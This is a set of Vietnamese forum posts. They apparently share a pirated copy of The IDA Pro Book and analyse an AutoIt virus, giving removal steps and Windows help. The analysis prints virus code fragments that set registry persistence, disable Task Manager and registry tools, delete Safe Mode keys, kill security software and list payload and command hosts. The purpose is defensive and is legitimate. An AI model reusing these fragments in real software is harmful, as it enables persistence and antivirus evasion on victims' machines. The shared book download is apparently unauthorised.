Messages posted by: Merc

[COLOR="Yellow"]The IDA Pro Book[/COLOR]

[COLOR="White"]The Unofficial Guide to the World's Most Popular Disassembler[/COLOR]

By Chris Eagle
August 2008
Publisher: No Starch Press
Pages: 640
ISBN 10: 1-59327-178-6 | ISBN 13: 9781593271787

[COLOR="White"]Description[/COLOR]

The IDA Pro Book provides a top-down overview of IDA Pro and its potential uses in the software reverse engineering field. After a thorough introduction to the origins and basic operation of IDA Pro, the book goes into depth on how to use IDA Pro. Author Chris Eagle, a recognized expert in the field, covers a variety of real-world reverse engineering challenges and offers strategies to deal with them, such as disassembly manipulation, graphing, and effective use of cross references.

[COLOR="Yellow"]"This is the densest, most accurate, and, by far, the best IDA Pro book ever released."[/COLOR]
[COLOR="Yellow"]—Pierre Vandevenne, Owner and CEO of DataRescue SA[/COLOR]

[COLOR="Red"]Chris Eagle[/COLOR] is a senior lecturer at the US Naval Postgraduate School in Monterey, California. He is a co-author of Gray Hat Hacking and has spoken at numerous security conferences, including Black Hat, DEFCON, ToorCon, and ShmooCon.

[COLOR="White"]CHM Edition[/COLOR]

Code:

http://www.megaupload.com/?d=O8CW73BY

[COLOR="Red"]Big thanks susanalic[/COLOR]

Một phần code của nó nè :

Code:

RegWrite("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon", "Shell", "REG_SZ", "Explorer.exe " & $A2A402040203C & $A5F40C040C013)
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", "Yahoo Messengger", "REG_SZ", @SystemDir & "\" & $A2A402040203C & $A5F40C040C013)
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer", "NofolderOptions", "REG_DWORD", 1)
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", 1)
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableRegistryTools", "REG_DWORD", 1)
RegWrite("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Schedule", "AtTaskMaxHours", "REG_DWORD", 0)
RegDelete("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}")
RegDelete("HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}")
RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\WorkgroupCrawler\Shares", "shared", "REG_SZ", & "\Bi mat.exe")

Code:

If ProcessExists("game_y.exe") Then
ProcessClose("game_y.exe")
Sleep(0x03E8)
EndIf

Code:

$gDimArr0000[0] = "http://setting.110mb.com"
$gDimArr0000[1] = "http://hvaonline.com.googlepages.com"
$gDimArr0000[2] = "http://setting3.t35.com"

Code:

WinGetTitle("Yahoo! Messenger", "")
WinExists($A50F0C0F0C04D, "Phone In")
$gDimArr0003[] = "Vao coi tin nay di " & & " "
"Bkav,System Configuration,Registry,Regedit,Task,Policy,Bkis,HijackThis,FireLion,cmd,Process,Kasperky,Norton,H V A O n l i n e,HVAOnline,Google,Search,AGV"

Ha ha, nó còn search cả chữ HVA để kill lol

Virut được viết bằng Autoit.

Đầu tiên dùng các trình quản lý process kill đi cái IEXPLORER.exe trong system32. Rồi dùng một trình Registry Editor khác như Registry Workshop để vào registry tìm tới các khóa :

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options

Xóa hết những gì trong dir này.

Lại navigate tới key :

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\systems

Để enable lại Registry Editor trong Win.

Chạy mấy file .reg này để restore lại registry đã bị thay đổi bởi virus :

Code:

http://www.mediafire.com/?rbrw4pz0eid

Tìm tới khóa Run để xem, hình như nó còn trỏ YM về virus. Merc không nhớ lém.

Chú ý virus tạo ra nhiều file trong máy trùng tên với folder nên dùng một av khác để scan và delete zùm. Nó còn dowload files từ host :

Code:

http://chuafiledownload.t35.com/posonivy.doc
 http://chuafiledownload.t35.com/ppk.doc

RSA 1024bits smilie

.

Thằng này hiểm quá trời luôn ^.^.

Buồn tình, ngồi nghịch, thấy luôn bạn dungcoi trong sig virr của Bit. Ngưỡng mộ ngưỡng mộ :

dungcoi.DL DL3tFontData SHELL33ÀŽØúŽÐ¸ |‹ P33ÀŽØúŽÐ¸ |‹àû P3¡—AD Áà£›AD WQ3 ....

Không biết con này là con nào của bạn Dũng còi nhỉ ...

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL

Change key CheckedValue = 1 (REG_DWORD)

Còn nếu không hiện được file ẩn thì :

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\NOHIDDEN

Change key CheckedValue = 2 (REG_DWORD)

Nhưng wan trọng nhất là bro phải thịt được con virus trên máy rùi đã. Thử xài sản phẩm của anh LeVuHoang ấy. Chắc chắn ảnh đã cập nhật con này rùi smilie

.

@tutk : Các hạ hơi bị nghi ngờ roài đó. Mà các hạ bảo "không thể mở được" sao vẫn post được info trong đó lên thế kia. Mỗ xin nói rằng, file desktop.ini chỉ là file để thiết lập các hiển thị của folder chứa nó mà thôi. Ví dụ các hạ có thể vào mấy folder My Music, My Picuture, icon của Recycle Bin ... sẽ thấy là đều có file desktop.ini này. Còn file "desktop.ini" mà các hạ nói phải chăng là "_desktop.ini".

Híc xưng hô kiểu này mệt gớm smilie

Bác tmd cho em xin pass với smilie

Ghost Ship wrote:

Merc wrote:

Làm thế sai rồi. Vào cmd gõ vào lệnh sau :

ATTRIB -R -S -H /S /D [drive:][path][filename]

để remove attribute System của folder và file

Bó chiếu toàn phần ) có biết cái đoạn code trên có tác dụng gì kô vậy? Ở đâu chui ra mà phát biểu hồn nhiên như cô tiên đi trong công viên vậy )

Vậy nếu kô nhớ cái [drive:][path][filename] thì sao? có 20 cái folder để ẩn vậy thì phải gõ 20 lần cái lệnh kia à?

Mình bảo cậu sai vì cậu trả lời không đúng những gì crony117 hỏi smilie

. Híc tự dưng bị phán là "cô tiên đi trong công viên" mới đau tui chứ. Khửa khửa :?)

Merc

Làm thế sai rồi. Vào cmd gõ vào lệnh sau :

ATTRIB -R -S -H /S /D [drive:][path][filename]

để remove attribute System của folder và file smilie

Về việc này em cũng đồng quan điểm với anh nbthanh. Nếu chỉ đưa ra ở mức ý tưởng, người đọc có thể thấy đó là hay thật đấy, nhưng rồi sau đấy thì chưa thấy ứng dụng của nó vào đâu. Vậy sao anh mrro không relese beta lun, lúc đó cùng nhau so sánh.

Về sản phần IEProtector của anh Hoàng thì em chưa có điều kiện test, nhưng cá nhân em vẫn đang dùng Norton AV 2005, click vào mấy link chứa Autoit với cả IE và Firefox chả get được em nào. Cái lần Gaixinh thì vừa click vô cái Norton nó đã del lun rùi.

Cuối cùng vấn đề an toàn là vẫn thuộc về ý thức cảnh giác của người sử dụng.

Start menu - Run - services.msc - Enter :

Double click vào Security Center :

Good Luck !

Có một bản, bản đó khoảng 300 $. Cậu liên hệ với đại diện của Microsoft tại Việt Nam nhé, hoặc lên trang chủ của Microsoft order cũng được.

Bạn nhấp chuột phải Search For - All Intermodular Calls